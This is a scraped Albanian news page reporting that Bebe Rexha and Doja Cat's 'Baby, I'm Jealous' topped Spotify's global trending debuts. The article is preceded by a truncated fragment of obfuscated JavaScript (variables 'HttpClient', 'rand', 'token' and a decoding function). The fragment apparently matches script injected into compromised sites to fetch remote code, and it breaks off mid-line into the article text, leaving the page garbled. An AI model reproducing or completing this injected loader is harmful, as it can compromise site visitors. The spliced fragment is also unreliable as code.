;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Kënga e Bebe Rexhës renditet e para në rangun botëror të këngëve më në trend të momentit

By

Këngëtarja shqiptare me famë ndërkombëtare, Bebe Rexha, pesë ditë më parë ka publikuar bashkëpunimin e saj me Doja Cat.

E vetëm pesë ditë mjaftuan që “Baby, I’m jealous” të rradhitet e para në rangun botëror për këngët më in të momentit.

Kënga është pritur shumë mirë nga fansat dhe deri më tani ka arritur mbi 11 milionë klikime në kanalin YouTube.

“Baby, I’m Jealous” po renditet lart edhe në top listat britanike dhe amerikane, si dhe aktualisht është kënga e parë në listën e këngëve “top trend” të platformës më të madhe të muzikës në botë, Spotify.

Kjo u bë e ditur nga faqja “Spotify Charts” të cilët kanë publikuar në rrjetin social Twitter një infografikë, të 10 këngëve më në trend për momentin në botë.

“Bebe Rexha dhe Doja Cat, ‘Baby, I’m Jealous’ është numër një në top 10 debutimet globale. Këto këngë kanë bërë hapjen më të madhe të vikendit rreth e rrotull botës”, thuhet në postimin e Spotify Charts.

Kujtojmë se pjesë e klipit ishin yjet e TikTok-ut: Nikita Dragun, Charli D’Amelio dhe Avani Gregg.

Artikuj të ngjashëm